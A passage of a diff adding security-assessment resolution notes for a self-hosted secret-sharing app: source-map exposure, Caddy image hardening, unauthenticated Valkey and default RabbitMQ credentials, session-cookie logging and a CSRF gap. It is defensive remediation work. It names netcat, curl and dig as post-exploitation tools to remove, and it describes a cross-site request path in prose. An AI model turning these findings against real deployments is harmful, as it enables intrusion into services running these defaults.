+  the existing frontend test suite and the `axios-mock-adapter` tests (`pnpm-lock.yaml:7021`).

--- a/docs/security/assessment-2026-06-22/resolutions/D3-production-source-maps.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D3-production-source-maps.md
@@ -1,0 +1,113 @@
+# D3 — Production source maps emitted and served at `/dist`
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** **Yes** — static-file serving is on by default
+  (`MIDDLEWARE_STATIC_FILES != 'false'`, `config.defaults.yaml:302`), and the build emits maps unconditionally.
+- **Related:** Finding 06 #3; D4 (Caddy variant re-copies the same `public/web` tree, so the maps leak
+  through the proxy image too).
+- **Primary files:** `vite.config.ts:283` (`sourcemap: true`),
+  `lib/onetime/middleware/static_files.rb:66-75` (serves `/dist` with no extension filter),
+  `fly.toml:96-98` (`[[statics]] guest_path = '/app/public/web/dist'` → `url_prefix = '/dist'`),
+  `docker/variants/caddy.dockerfile:114` (`COPY ./public/web ${PUBLIC_DIR}`).
+
+## Problem (recap)
+
+The Vite build sets `build.sourcemap: true` (`vite.config.ts:283`) with `outDir: '../public/web/dist'`
+(`vite.config.ts:240`). That emits `*.js.map` files alongside the minified bundle **and** writes a
+`//# sourceMappingURL=...` comment into each bundle. Those map files are then publicly served:
+
+- `lib/onetime/middleware/static_files.rb:66-75` mounts `Rack::Static` for `urls: ['/dist', ...]` rooted
+  at `public/web` with **no extension allowlist/denylist** — any file under `/dist`, including `*.map`,
+  is served verbatim.
+- `fly.toml:96-98` serves `/app/public/web/dist` at `/dist` via the Fly proxy's `[[statics]]`.
+- The Caddy variant copies the whole `public/web` tree into its served root (`caddy.dockerfile:114`) and
+  `file_server`s it (`etc/examples/Caddyfile-example`), so the proxy deployment leaks the maps too.
+
+Result: the original TypeScript/Vue source structure is publicly retrievable at `/dist/assets/*.js.map`,
+aiding reconnaissance of client logic and endpoints. (No server secrets are in the client bundle, hence
+Medium, not High.)
+
+The in-code comment at `vite.config.ts:219` ("Sentry sourcemaps are uploaded via CI, not at build time")
+concerns *upload* of maps to Sentry for error symbolication — it does **not** stop the maps from being
+emitted to disk and served.
+
+## Root cause
+
+`sourcemap: true` both **emits** the `.map` files and **references** them from the bundle via a
+`sourceMappingURL` comment. The map files are emitted into the same directory that is shipped in the
+image and served as static assets, and neither the static-file middleware, the Dockerfile, nor the
+Caddy `COPY` strips them.
+
+## Prescribed resolution
+
+The goal: keep maps available for **Sentry symbolication** (uploaded from CI) but never publicly serve
+them, and never advertise their location from the shipped bundle.
+
+### Implementation steps
+
+1. **Switch to `'hidden'` source maps** in `vite.config.ts:283`:
+   ```ts
+   // vite.config.ts (build block)
+   sourcemap: 'hidden',   // emit .map for Sentry upload, but DROP the //# sourceMappingURL comment
+   ```
+   `'hidden'` still writes the `.map` files (so the CI `sentry-cli sourcemaps upload` step keeps working)
+   but removes the `sourceMappingURL` reference from each bundle, so a browser/attacker is not pointed at
+   them. This is the single most important change.
+
+2. **Strip the `.map` files from the shipped artifact after the Sentry upload** so they are never
+   reachable even by guessing the filename. In the CI build job
+   (`.github/workflows/build-and-publish-oci-images.yml`), after the `sentry-cli sourcemaps upload`
+   step and **before** the image is packaged:
+   ```bash
+   # Maps have been uploaded to Sentry; remove them from the served tree
+   find public/web/dist -name '*.map' -type f -delete
+   ```
+   This keeps symbolication intact (Sentry already has the maps) while guaranteeing the runtime image
+   contains no `.map` files for either the Ruby static server or the Caddy proxy to serve.
+
+3. **Defence-in-depth: deny `.map` at the static layer** so a future build regression can't re-leak them.
+   In `lib/onetime/middleware/static_files.rb`, after the `Rack::Static` mount, add a guard that returns
+   `404` for any `*.map` request under `/dist` (e.g. a small middleware that rejects
+   `env['PATH_INFO'] =~ %r{\A/dist/.*\.map\z}` before delegating). Mirror this in the Caddy config: add a
+   matcher in `etc/examples/Caddyfile-example` that responds `404`/`403` to `path *.map` inside the
+   `onetime-root` snippet (around the `file_server` directive, `Caddyfile-example:~184/~390`).
+
+4. **(Optional) exclude maps from the proxy COPY** in `docker/variants/caddy.dockerfile:114`. Since maps
+   are stripped in step 2 this is belt-and-suspenders, but a `.dockerignore`-style exclusion or a
+   post-`COPY` `RUN find ... -name '*.map' -delete` documents intent.
+
+### Alternatives considered
+
+- **`sourcemap: false` (don't emit at all):** rejected — it would break Sentry symbolication of
+  production frontend errors. `'hidden'` preserves the maps for upload while hiding them from clients.
+- **Serve maps but gate behind auth / IP allowlist:** more moving parts, easy to misconfigure, and Sentry
+  already holds the maps. Simpler to not ship them at runtime.
+- **Rely only on `'hidden'` (skip the file deletion):** weaker — `'hidden'` removes the *pointer* but the
+  `.map` files still sit in `/dist` and are guessable (`assets/main.<hash>.js` → `assets/main.<hash>.js.map`).
+  Combine `'hidden'` with the CI strip (step 2) for a complete fix.
+
+## Test / verification
+
+```bash
+# 1. After build, bundles no longer reference maps
+pnpm run build
+grep -rL "sourceMappingURL" public/web/dist/assets/*.js   # expect: all files (no reference)
+
+# 2. After the CI strip step, no map files ship
+find public/web/dist -name '*.map'                          # expect: no output
+
+# 3. Runtime: a guessed .map URL is not served (run the app, static_files default-on)
+curl -s -o /dev/null -w '%{http_code}\n' http://localhost:3000/dist/assets/main.<hash>.js.map
+#    -> expect 404 (not 200)
+
+# 4. Sentry still symbolicates: trigger a frontend error and confirm the Sentry event shows
+#    original TS frames (maps were uploaded by CI before deletion).
+```
+
+## Effort & risk
+
+- **Effort:** Small — one Vite config line, one CI cleanup step, plus optional middleware/Caddy guards.
+- **Risk:** Low. The only behavioral dependency is Sentry symbolication; `'hidden'` + upload-then-delete
+  preserves it. Verify the CI upload runs **before** the delete (step ordering is the one thing to get
+  right).

--- a/docs/security/assessment-2026-06-22/resolutions/D3-production-source-maps.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D3-production-source-maps.md
@@ -1,7 +1,7 @@
 # D3 — Production source maps emitted and served at `/dist`
 
 - **Severity:** Medium
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** **Yes** — static-file serving is on by default
   (`MIDDLEWARE_STATIC_FILES != 'false'`, `config.defaults.yaml:302`), and the build emits maps unconditionally.
 - **Related:** Finding 06 #3; D4 (Caddy variant re-copies the same `public/web` tree, so the maps leak
@@ -10,6 +10,21 @@
   `lib/onetime/middleware/static_files.rb:66-75` (serves `/dist` with no extension filter),
   `fly.toml:96-98` (`[[statics]] guest_path = '/app/public/web/dist'` → `url_prefix = '/dist'`),
   `docker/variants/caddy.dockerfile:114` (`COPY ./public/web ${PUBLIC_DIR}`).
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> Step 2 below (host-side `find public/web/dist -name '*.map' -delete` in CI) is **non-implementable as
+> written** — the prescribed window does not exist. In `.github/workflows/build-and-publish-oci-images.yml`
+> the **Build and push with Bake** step (`:243`, `push:` `:256`) runs **before** the **Upload frontend
+> sourcemaps to Sentry** step (`:285`): the image is already built and pushed by the time Sentry runs, so
+> there is no "after Sentry upload, before packaging" moment to delete maps in. The targeted
+> `public/web/dist/` is also **gitignored** (`.gitignore:53`) and is produced *inside* the Docker Bake
+> build stages, not on the host runner — so the host-side `find` operates on an absent/empty tree.
+>
+> **Correction:** strip the source maps **inside the Dockerfile build stage** — either delete `*.map`
+> after the bundler emits them within the build, or (cleaner) never `COPY` them from the build stage into
+> the final stage. Steps 1 (`sourcemap: 'hidden'`) and 3 (static-layer `.map` 404 guard) stand unchanged.
+> Note Sentry symbolication does not depend on a host strip: the upload reads the build artifact, and with
+> `'hidden'` the maps still exist in the build stage for upload before the final-stage strip.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/D4-caddy-image-hardening.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D4-caddy-image-hardening.md
@@ -1,0 +1,131 @@
+# D4 — Internet-facing Caddy proxy image is poorly hardened
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** Yes for the **full stack** — `docker-compose.full.yml` builds and runs this
+  image as the TLS-terminating, internet-facing proxy. (The simple compose has no proxy.)
+- **Related:** Finding 06 #4; D3 (this image re-serves the same `public/web` source maps).
+- **Primary files:** `docker/variants/caddy.dockerfile:85` (`FROM debian:bookworm-slim`, unpinned, no
+  `USER`), `:91-97` (apt without `--no-install-recommends`, installs curl/bind9-dnsutils/iputils-ping/netcat),
+  `:114` (`COPY ./public/web ${PUBLIC_DIR}`). Reference hardening: `Dockerfile:1,62,237-238,303,331-338,348-349,407`.
+
+## Problem (recap)
+
+The custom Caddy build (`docker/variants/caddy.dockerfile`) is the internet-facing proxy in the full
+stack, yet its runtime stage is the least-hardened image in the repo:
+
+- **Runs as root** — there is **no `USER` directive** anywhere in the file; the final `CMD ["caddy", ...]`
+  (`:125`) executes as `root` (PID 1).
+- **Base image not digest-pinned** — `FROM debian:bookworm-slim` at `:85` is a floating tag. (The
+  *builder* stage `:61` *is* pinned: `golang:1.26-bookworm@sha256:8e8aa801…`, and the main `Dockerfile`
+  pins everything — `ruby:3.4-slim-trixie@sha256:3f335cdd…` at `Dockerfile:62`.) The runtime stage breaks
+  this convention and undermines reproducibility/supply-chain integrity.
+- **`apt-get install` lacks `--no-install-recommends`** (`:91-97`), pulling recommended extras, and it
+  installs debugging/network tooling that does not belong in a production proxy: `curl`,
+  `bind9-dnsutils` (`dig`), `iputils-ping`, `netcat-openbsd`. These broaden the attack surface and are
+  handy post-exploitation primitives.
+- It also copies the whole `public/web` tree (`:114`), which includes the `.js.map` source maps — see D3.
+
+## Root cause
+
+The Caddy variant was written for convenience (debug tools, simple base) and was not brought in line with
+the hardening already applied to the main `Dockerfile` (non-root UID 1001, digest-pinned bases,
+`--no-install-recommends`, minimal package set).
+
+## Prescribed resolution
+
+Align the runtime stage with the main image's posture.
+
+### Implementation steps
+
+1. **Digest-pin the runtime base.** Resolve the current digest and pin it (matching the style of
+   `Dockerfile:62` and the builder stage `:61`):
+   ```dockerfile
+   # docker/variants/caddy.dockerfile:85
+   FROM debian:bookworm-slim@sha256:<resolved-digest>
+   ```
+   Resolve with:
+   ```bash
+   docker pull debian:bookworm-slim
+   docker inspect --format='{{index .RepoDigests 0}}' debian:bookworm-slim
+   ```
+
+2. **Drop `--install-recommends` and the debugging tools.** Caddy needs only `ca-certificates` at runtime
+   (TLS to upstreams/ACME). Replace `:91-97` with:
+   ```dockerfile
+   RUN apt-get update && apt-get install -y --no-install-recommends \
+           ca-certificates \
+       && rm -rf /var/lib/apt/lists/*
+   ```
+   Remove `curl`, `bind9-dnsutils`, `iputils-ping`, `netcat-openbsd`. (If a container healthcheck needs
+   an HTTP probe, use Caddy's built-in `/health` or the admin API on `:2019` rather than shipping `curl`;
+   the compose healthcheck for the proxy can hit the admin endpoint.)
+
+3. **Run as a non-root user.** Create a dedicated user and switch to it before `CMD`. Caddy binds 80/443,
+   which are privileged ports — grant the binary the capability to bind low ports instead of running as
+   root:
+   ```dockerfile
+   # after COPY of the caddy binary (:100) and before VOLUME/CMD
+   RUN groupadd -r caddy && useradd -r -g caddy -d /data -s /sbin/nologin caddy \
+       && setcap 'cap_net_bind_service=+ep' /usr/bin/caddy \
+       && mkdir -p /data /config ${PUBLIC_DIR} \
+       && chown -R caddy:caddy /data /config ${PUBLIC_DIR}
+   # ...
+   USER caddy
+   ```
+   (Requires `libcap2-bin` at build time for `setcap`; install it in the apt step and it can be removed,
+   or use a multi-stage `setcap`. Alternatively keep `cap_net_bind_service` and confirm the orchestrator
+   doesn't drop it.) Verify the `/data` and `/config` `VOLUME`s and the served `${PUBLIC_DIR}` are owned
+   by `caddy` so cert storage and config persistence keep working.
+
+4. **Stop shipping source maps** (ties into D3): after the `COPY ./public/web ${PUBLIC_DIR}` at `:114`,
+   strip maps:
+   ```dockerfile
+   RUN find ${PUBLIC_DIR} -name '*.map' -type f -delete
+   ```
+
+5. **Re-test the full stack** end to end (ACME/cert acquisition is the main thing that can break under a
+   non-root user + capability model).
+
+### Alternatives considered
+
+- **Base on the official `caddy:2` image (already non-root-friendly):** attractive, but this build uses
+  `xcaddy` to compile in plugins (`caddy-ratelimit`, `caddy-security`, `transform-encoder`, a `caddy-dns`
+  module — `:78-82`) that the stock image lacks, so a custom runtime stage is required. Keep the custom
+  build but harden it.
+- **Keep root, rely on the container runtime's user namespacing:** rejected — not every deployment uses
+  userns remapping; the image should be safe by default, consistent with the main image (`USER appuser`,
+  `Dockerfile:303,407`).
+- **`USER` without `setcap`, remap ports:** would force binding 8080/8443 and pushing port translation to
+  the host — more fragile for an ACME/HTTPS proxy than `cap_net_bind_service`.
+
+## Test / verification
+
+```bash
+# 1. Base is digest-pinned
+grep -n 'FROM debian' docker/variants/caddy.dockerfile        # expect @sha256:
+
+# 2. No debug tooling in the image
+docker buildx bake -f docker/bake.hcl caddy
+docker run --rm --entrypoint sh onetime-caddy:latest -c 'command -v dig ping nc curl; echo done'
+#    -> none found
+
+# 3. Runs as non-root
+docker run --rm --entrypoint sh onetime-caddy:latest -c 'id -u'   # expect non-zero (not 0)
+
+# 4. No source maps served
+docker run --rm --entrypoint sh onetime-caddy:latest -c 'find /var/www/public -name "*.map"'   # empty
+
+# 5. Functional: full stack comes up, proxy obtains/serves TLS, upstream app reachable
+docker compose -f docker/compose/docker-compose.full.yml up -d
+curl -sk https://localhost/api/v2/status     # 200 through the proxy
+```
+
+## Effort & risk
+
+- **Effort:** Small–Medium. The digest pin and `--no-install-recommends` are trivial; the non-root +
+  `cap_net_bind_service` change needs a build/run test pass (port binding and `/data` ownership for ACME
+  certs are the things to validate).
+- **Risk:** Low–Medium. The main risk is the privileged-port bind under a non-root user; `setcap
+  cap_net_bind_service` resolves it. Validate ACME cert acquisition and persistence to `/data` after the
+  ownership change before rolling out.

--- a/docs/security/assessment-2026-06-22/resolutions/D5-datastore-default-credentials.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D5-datastore-default-credentials.md
@@ -1,0 +1,151 @@
+# D5 — Unauthenticated Valkey (host-exposed) and `guest:guest` RabbitMQ defaults
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** **Yes** — both compose files run Valkey unauthenticated; the simple compose
+  publishes `6379` to the host; the full compose defaults RabbitMQ to `guest:guest`.
+- **Related:** Finding 06 #5 and #6 (consolidated here). Config-drift §5.
+- **Primary files:** `docker/compose/docker-compose.simple.yml:57` (`--bind 0.0.0.0`), `:68-69`
+  (`ports: - '6379:6379'`); `docker/compose/docker-compose.full.yml:99` (`--bind 0.0.0.0`), `:113`
+  (`expose: '6379'`), `:129-130` (`RABBITMQ_DEFAULT_USER/PASS ...:-guest`), `:167`,`:205`
+  (`amqp://${RABBITMQ_USER:-guest}:${RABBITMQ_PASS:-guest}@rabbitmq:5672`); `etc/examples/valkey.conf:7`
+  (`#requirepass CHANGEME`).
+
+## Problem (recap)
+
+**Valkey has no authentication in either compose file**, and the simple compose exposes it to the host:
+
+- `docker-compose.simple.yml` starts `valkey-server ... --bind 0.0.0.0 --port 6379` (`:57-58`) with **no
+  `requirepass`/ACL**, and publishes it to the host: `ports: - '6379:6379'` (`:68-69`). On any host
+  without an external firewall, the secret store — which holds encrypted secrets and session data —
+  is reachable on the host/LAN with **no authentication**.
+- `docker-compose.full.yml` is better: Valkey is `expose:`-only on the internal `onetime-network` bridge
+  (`:113`, not host-published) — but it still runs `--bind 0.0.0.0` with **no `requirepass`** (`:99`), so
+  anything that reaches the internal network (a compromised sibling container, a misconfigured network)
+  has unauthenticated read/write to the datastore.
+- The shipped example `etc/examples/valkey.conf:7` has `#requirepass CHANGEME` **commented out**, so even
+  operators who mount it get no password by default.
+
+**RabbitMQ defaults to `guest:guest`** in the full stack:
+
+- `docker-compose.full.yml:129-130` — `RABBITMQ_DEFAULT_USER=${RABBITMQ_USER:-guest}` /
+  `RABBITMQ_DEFAULT_PASS=${RABBITMQ_PASS:-guest}`, and the workers/scheduler connect with
+  `amqp://${RABBITMQ_USER:-guest}:${RABBITMQ_PASS:-guest}@rabbitmq:5672` (`:167`, `:205`). Ports are
+  `expose:`-only (`:140-142`, not host-published), so blast radius is the internal network, but shipping
+  well-known default credentials is poor hygiene and a footgun if anyone ever publishes the port.
+
+## Root cause
+
+The compose files prioritize zero-config startup over secure defaults: Valkey is started with no
+`requirepass` (and host-published in the simple variant), and RabbitMQ falls back to the vendor's
+`guest:guest` rather than failing closed on missing credentials — unlike the app's `SECRET`, which the
+same files correctly gate with `${SECRET:?...}` (`docker-compose.simple.yml:27`,
+`docker-compose.full.yml:65`).
+
+## Prescribed resolution
+
+### Implementation steps
+
+1. **Require a Valkey password and pass it to the app.** Generate one in `install.sh` alongside the other
+   secrets (it already uses `SecureRandom`-based generation and `chmod 600` on `.env`), write it to
+   `.env`, then wire it in:
+
+   - **Valkey command** (both compose files, `:50-62` simple / `:92-104` full) — add a password and bind
+     to the container interface only:
+     ```yaml
+     command: >
+       valkey-server
+       --appendonly yes
+       # ... existing flags ...
+       --requirepass ${VALKEY_PASSWORD:?VALKEY_PASSWORD must be set — run ./install.sh}
+     ```
+   - **App / worker / scheduler `VALKEY_URL`** — include the password (currently
+     `redis://maindb:6379/0`, `:26`/`:63`/`:165`/`:203`):
+     ```yaml
+     - VALKEY_URL=redis://:${VALKEY_PASSWORD}@maindb:6379/0
+     ```
+   - **Healthcheck** must authenticate too (`:74` simple / `:119` full):
+     ```yaml
+     test: ['CMD', 'valkey-cli', '-a', '${VALKEY_PASSWORD}', 'ping']
+     ```
+   Use `:?` (fail-closed) for `VALKEY_PASSWORD` in the same way `SECRET` is gated, so the stack refuses to
+   start with an empty password rather than silently running open.
+
+2. **Do not publish 6379 to the host in the simple compose.** Drop the host port mapping at
+   `docker-compose.simple.yml:68-69`. If host access is genuinely needed for debugging, bind to loopback
+   only:
+   ```yaml
+   # remove:
+   #   ports:
+   #     - '6379:6379'
+   # if local debugging is required, scope to localhost only:
+   ports:
+     - '127.0.0.1:6379:6379'
+   ```
+   The full compose already does the right thing (`expose: '6379'`, `:113`) — keep that. Consider keeping
+   `--bind 0.0.0.0` (necessary so other containers on the docker network can connect) but rely on
+   `requirepass` + network isolation rather than the bind address for security.
+
+3. **Update `etc/examples/valkey.conf`** so the mounted-config path is also safe by default: change `:7`
+   from `#requirepass CHANGEME` to an active, documented `requirepass` (or a clear note that it MUST be
+   set), and keep `bind 127.0.0.1` for the non-Docker local case.
+
+4. **Require non-default RabbitMQ credentials.** In `install.sh`, generate `RABBITMQ_USER` /
+   `RABBITMQ_PASS` and write them to `.env`. Then change the full compose to fail closed instead of
+   falling back to `guest`:
+   ```yaml
+   # docker-compose.full.yml:129-130
+   - RABBITMQ_DEFAULT_USER=${RABBITMQ_USER:?RABBITMQ_USER must be set — run ./install.sh}
+   - RABBITMQ_DEFAULT_PASS=${RABBITMQ_PASS:?RABBITMQ_PASS must be set — run ./install.sh}
+   ```
+   and the worker/scheduler URLs (`:167`, `:205`):
+   ```yaml
+   - RABBITMQ_URL=amqp://${RABBITMQ_USER}:${RABBITMQ_PASS}@rabbitmq:5672
+   ```
+   Document credential rotation (regenerate, update `.env`, recreate the RabbitMQ container so the new
+   default user takes effect, or use `rabbitmqctl` to change the password in place).
+
+5. **Document the upgrade path** for existing deployments: setting `requirepass` on an existing Valkey
+   requires the app's `VALKEY_URL` to carry the password simultaneously (restart both together), and
+   rotating the RabbitMQ default user on an existing volume requires either recreating the broker or an
+   in-place `rabbitmqctl change_password`.
+
+### Alternatives considered
+
+- **Valkey ACL users instead of a single `requirepass`:** stronger (least-privilege per client), and
+  recommended if the threat model warrants — but a single strong `requirepass` plus network isolation is
+  a proportionate baseline and far simpler to wire through `install.sh`. ACLs can layer on top later.
+- **TLS between app and Valkey/RabbitMQ:** valuable for hostile networks, but heavier (cert management);
+  out of scope for closing the default-credentials gap. The container network + auth is the priority fix.
+- **Leave RabbitMQ on `guest:guest` because ports aren't published:** rejected — defence-in-depth; a
+  single port-publish mistake or a compromised sibling container would expose a trivially-guessable login.
+
+## Test / verification
+
+```bash
+# 1. Stack refuses to start without credentials (fail-closed)
+unset VALKEY_PASSWORD RABBITMQ_USER RABBITMQ_PASS
+docker compose -f docker/compose/docker-compose.full.yml config   # expects error on the :? vars
+
+# 2. With creds set, Valkey rejects unauthenticated access
+docker compose -f docker/compose/docker-compose.simple.yml up -d
+docker exec onetime-maindb valkey-cli ping                 # -> NOAUTH Authentication required.
+docker exec onetime-maindb valkey-cli -a "$VALKEY_PASSWORD" ping   # -> PONG
+
+# 3. 6379 is not reachable from the host in the simple compose
+nc -z -w2 127.0.0.1 6379 ; echo $?    # non-zero (refused) unless intentionally bound to 127.0.0.1
+
+# 4. RabbitMQ has no guest login
+docker exec onetime-rabbitmq rabbitmqctl authenticate_user guest guest   # -> fails
+
+# 5. App + workers function end to end with the new creds
+curl -s http://localhost:3000/api/v2/status     # 200; create + retrieve a secret round-trips
+```
+
+## Effort & risk
+
+- **Effort:** Medium — touches both compose files, `valkey.conf`, and `install.sh` (credential
+  generation + `.env` writes), plus migration docs for existing deployments.
+- **Risk:** Medium. The breaking edge is coordinating the password across Valkey + every consumer
+  (`VALKEY_URL`, healthcheck) and rotating an existing RabbitMQ default user on a persisted volume —
+  sequence the rollout (set creds → recreate datastores → restart app/workers) and document it.

--- a/docs/security/assessment-2026-06-22/resolutions/OBS1-session-debugger-header-dump.md
+++ b/docs/security/assessment-2026-06-22/resolutions/OBS1-session-debugger-header-dump.md
@@ -1,0 +1,124 @@
+# OBS1 — `SessionDebugger` dumps full response headers (incl. `Set-Cookie`)
+
+- **Severity:** Info (Low) — gated and off by default
+- **Status:** Proposed fix (hardening + boot guard)
+- **Affects default config?** **No** — disabled unless `DEBUG_SESSION` is set, and only mounted in the
+  development environment.
+- **Related:** Finding 06 #8. Sensitive-data-logging §6 (companion to the already-unwired
+  `HeaderLoggerMiddleware`).
+- **Primary files:** `lib/middleware/session_debugger.rb:98-103` (the `response_headers: headers` dump),
+  `apps/web/core/application.rb:45-50` (mounted inside `Onetime.development?`, gated on `ENV['DEBUG_SESSION']`).
+
+## Problem (recap)
+
+When `DEBUG_SESSION` is truthy, `Rack::SessionDebugger` logs the **entire** response header hash at debug
+level:
+
+```ruby
+# lib/middleware/session_debugger.rb:98-103
+logger.debug 'Session debug complete',
+  {
+    status: status,
+    duration: duration,
+    response_headers: headers,    # <-- includes Set-Cookie (the session cookie value)
+  }
+```
+
+This re-introduces the full `Set-Cookie` header — including the session cookie **value** — into the logs.
+The middleware is otherwise careful: `log_cookies` (`:238-264`) deliberately discards the cookie
+name/value (`:247`) and only logs the cookie *attributes*, and `log_session_state` obscures `email`
+(`:145`). The wholesale `response_headers: headers` dump at `:102` defeats that care. It would also log
+any `Authorization` or other sensitive response headers verbatim.
+
+**Mitigating context (verified):** the middleware is mounted **only inside the `Onetime.development?`
+block** — `apps/web/core/application.rb:45-50` — so with the production default (`RACK_ENV=production`,
+which resolves to the `production` environment per `lib/onetime/class_methods.rb:409-415,432`) it is not
+even added to the stack, regardless of `DEBUG_SESSION`. The risk is therefore confined to a developer who
+sets `DEBUG_SESSION` in a dev environment. Still worth fixing: a stray session cookie value in dev logs
+is needless exposure, and the current "dev-only" guarantee rests entirely on the `development?` wrapper
+not being refactored away.
+
+## Root cause
+
+A debug convenience (dump everything) was added without a redaction filter, and the only thing preventing
+production exposure is the placement of the `use` line inside the `development?` block — there is no
+in-middleware guard that would survive a refactor.
+
+## Prescribed resolution
+
+### Implementation steps
+
+1. **Redact sensitive headers before logging them.** In `session_debugger.rb` add a small allowlist/denylist
+   helper and use it at `:102`:
+   ```ruby
+   SENSITIVE_RESPONSE_HEADERS = %w[set-cookie authorization www-authenticate proxy-authenticate].freeze
+
+   def redact_headers(headers)
+     headers.to_h.transform_keys(&:downcase).each_with_object({}) do |(k, v), out|
+       out[k] = SENSITIVE_RESPONSE_HEADERS.include?(k) ? '[REDACTED]' : v
+     end
+   end
+   ```
+   ```ruby
+   # :98-103 — replace `response_headers: headers` with:
+   response_headers: redact_headers(headers),
+   ```
+   This keeps the diagnostic value (which headers were present, their non-sensitive values) without
+   leaking the session cookie or auth tokens.
+
+2. **Add a fail-closed boot guard so it can never run in production**, independent of where it is mounted.
+   At the top of `SessionDebugger#initialize` (`:25-28`), refuse to enable in production even if
+   `DEBUG_SESSION` is somehow set:
+   ```ruby
+   def initialize(app)
+     @app = app
+     wanted = ENV['DEBUG_SESSION'].to_s.match?(/^(true|1|yes)$/i)
+     if wanted && Onetime.production?
+       Onetime.li '[SessionDebugger] DEBUG_SESSION ignored in production'
+       wanted = false
+     end
+     @enabled = wanted
+   end
+   ```
+   This makes the guarantee intrinsic to the middleware rather than relying on the `application.rb:45`
+   `development?` wrapper staying in place.
+
+3. **Document the risk** in the middleware header comment (`:5-17`): note that `DEBUG_SESSION` logs
+   session diagnostics, that sensitive headers are redacted, and that it is inert in production — so a
+   future reader doesn't "helpfully" remove the guard or the redaction.
+
+### Alternatives considered
+
+- **Drop the `response_headers` line entirely:** simplest, and acceptable — but the redacted header list
+  retains genuine debugging value (confirming `Content-Type`, cache headers, presence of `Set-Cookie`
+  without its value). Redaction is a better balance than deletion.
+- **Rely solely on the `development?` mount placement:** rejected — that is the *current* state and it is
+  one refactor away from leaking. An in-middleware production guard is cheap insurance.
+- **Gate on a log-level config instead of redacting:** doesn't help — anyone enabling `DEBUG_SESSION` is
+  already opting into debug-level output; the cookie value must not be there in the first place.
+
+## Test / verification
+
+```ruby
+# Spec: with DEBUG_SESSION enabled (dev), Set-Cookie is redacted in the response_headers dump.
+# - Drive a request that sets a session cookie through the middleware.
+# - Assert the emitted 'Session debug complete' log entry's response_headers['set-cookie'] == '[REDACTED]'
+#   and that no raw 'rack.session=' value appears in any captured log line.
+
+# Boot guard:
+# - With RACK_ENV=production and DEBUG_SESSION=true, assert @enabled is false (middleware no-ops),
+#   and that an info line notes DEBUG_SESSION was ignored.
+```
+
+Manual:
+```bash
+DEBUG_SESSION=true RACK_ENV=development bundle exec puma   # exercise login, grep logs:
+#   -> 'response_headers' present, 'set-cookie' shows [REDACTED], no raw session value
+RACK_ENV=production DEBUG_SESSION=true bundle exec puma     # -> debugger inert
+```
+
+## Effort & risk
+
+- **Effort:** Trivial — a redaction helper, a four-line boot guard, and a comment.
+- **Risk:** Very low. Affects only debug logging behavior; no production code path changes (the middleware
+  is not mounted in production today and the guard makes that explicit).

--- a/docs/security/assessment-2026-06-22/resolutions/P1-csrf-cookie-auth-api.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P1-csrf-cookie-auth-api.md
@@ -1,0 +1,65 @@
+# P1 — CSRF protection bypassed for cookie-authenticated API mutations
+
+- **Severity:** High (any logged-in/cookie session using API-backed actions)
+- **Status:** Proposed fix
+- **Affects default config?** Conditional — applies once accounts/sessions are used
+- **Related:** S2 (HttpOrigin off by default). Finding 04 #2.
+- **Primary files:** `lib/onetime/middleware/security.rb:142` (blanket `/api/` CSRF exemption),
+  `apps/api/*/auth_strategies.rb` (per-route `auth=sessionauth,...`)
+
+## Problem (recap)
+
+The entire `/api/` prefix is exempted from token-based CSRF protection, but many `/api/*` POST/PATCH
+endpoints accept `auth=sessionauth` (browser cookie) — including account deletion, password and
+API-token changes, and secret creation. A cross-site form/`fetch` from an attacker page therefore rides
+the victim's session cookie. The only origin-based fallback (`HttpOrigin`) is off by default (S2).
+
+## Root cause
+
+CSRF exemption is keyed on the **URL prefix** (`/api/`) rather than on the **authentication method** of
+the request. The exemption is correct for *stateless* token/Basic-auth API calls (no ambient
+credentials, so no CSRF risk) but wrong for *cookie-authenticated* requests to the same paths.
+
+## Prescribed resolution
+
+Make CSRF protection a function of how the request is authenticated, not its path prefix:
+
+1. **Exempt only ambient-credential-free auth.** Stateless requests (Bearer/API-token, HTTP Basic) carry
+   no cookie and are not CSRF-able → keep exempt. Requests authenticated by the **session cookie** must
+   pass CSRF validation for unsafe methods (POST/PUT/PATCH/DELETE).
+2. **Reuse the existing token.** Rodauth already issues a CSRF token and the SPA holds it in memory
+   (`csrfStore`), sending it as a header. Validate that header for cookie-authenticated `/api/*`
+   mutations (the SPA already has the token; service-to-service token clients are unaffected).
+3. **Belt-and-suspenders origin check.** Enable `HttpOrigin` (see S2) so Origin/Referer is validated for
+   state-changing requests, and set the session cookie `SameSite=Lax` (or `Strict` where UX allows) as a
+   second independent layer.
+
+```ruby
+# sketch: decide CSRF requirement from the resolved auth strategy
+use Rack::Protection::AuthenticityToken, except_when: ->(req, env) {
+  env['otts.auth_method'].in?(%w[apitoken basicauth])   # stateless => exempt
+}                                                        # cookie/session => enforced
+```
+
+(Record the chosen auth method in the env during the auth-strategy phase so the CSRF layer can read it.)
+
+## Alternatives considered
+
+- **Enable CSRF for the whole `/api/` prefix unconditionally:** would break legitimate stateless token
+  clients (which can't hold a CSRF token). The auth-method split avoids that.
+- **Rely on SameSite alone:** helpful but not sufficient (older browsers, `Lax` still allows top-level
+  GET navigations; some flows need POST). Use SameSite + token + origin together.
+
+## Test / verification
+
+- Cross-origin POST to `/api/v2/account/destroy` (or password change) with only the session cookie and no
+  CSRF header → **403**; same request with a valid CSRF header → allowed.
+- Token/Basic-auth client POST with no CSRF header → allowed (unchanged).
+- SPA end-to-end: normal authenticated mutations still succeed (token is sent).
+
+## Effort & risk
+
+- **Effort:** Medium — thread the resolved auth method into the CSRF decision; audit which `/api/*`
+  routes accept `sessionauth`.
+- **Risk:** Medium — get the exemption predicate right or you either break token clients or under-protect
+  cookie clients. Cover both with the tests above. Pairs with S2.

--- a/docs/security/assessment-2026-06-22/resolutions/P1-csrf-cookie-auth-api.md
